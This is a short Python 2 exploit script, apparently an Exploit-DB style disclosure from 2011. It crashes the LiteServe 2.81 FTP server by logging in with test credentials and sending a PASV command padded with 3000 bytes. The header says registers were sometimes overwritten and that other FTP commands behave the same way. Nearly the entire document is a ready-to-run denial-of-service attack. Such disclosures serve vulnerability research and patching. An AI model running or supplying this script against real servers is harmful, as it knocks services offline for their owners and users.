#!/usr/bin/python #Title: LiteServe 2.81 PASV Command DoS #Author: Craig Freyman (@cd1zz) #Date: Bug found July 25, 2011 - Vendor approved release August 7, 2011 #Tested on Windows XP SP3 and Server 2003 SP2 #Software: http://www.cmfperception.com/liteserve.html #Notes: In certain conditions that I could not reproduce reliably, registers were #overwritten. There are a number of other FTP commands that exhibit the same behavior.
import socket,sys,time,struct
if len(sys.argv) < 2: print "[-]Usage: %s <target addr> " % sys.argv[0] sys.exit(0)
target = sys.argv[1]
if len(sys.argv) > 2: platform = sys.argv[2]
crash = "\x41" * 3000
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try: s.connect((target,21)) except: print "[-] Connection to "+target+" failed!" sys.exit(0)
print "[*] Sending " + `len(crash)` + " byte crash..."
s.send("USER test\r\n") s.recv(1024) s.send("PASS test\r\n") s.recv(1024) s.send("PASV "+crash+"\r\n") print "Sleeping..." time.sleep(5) s.close()
|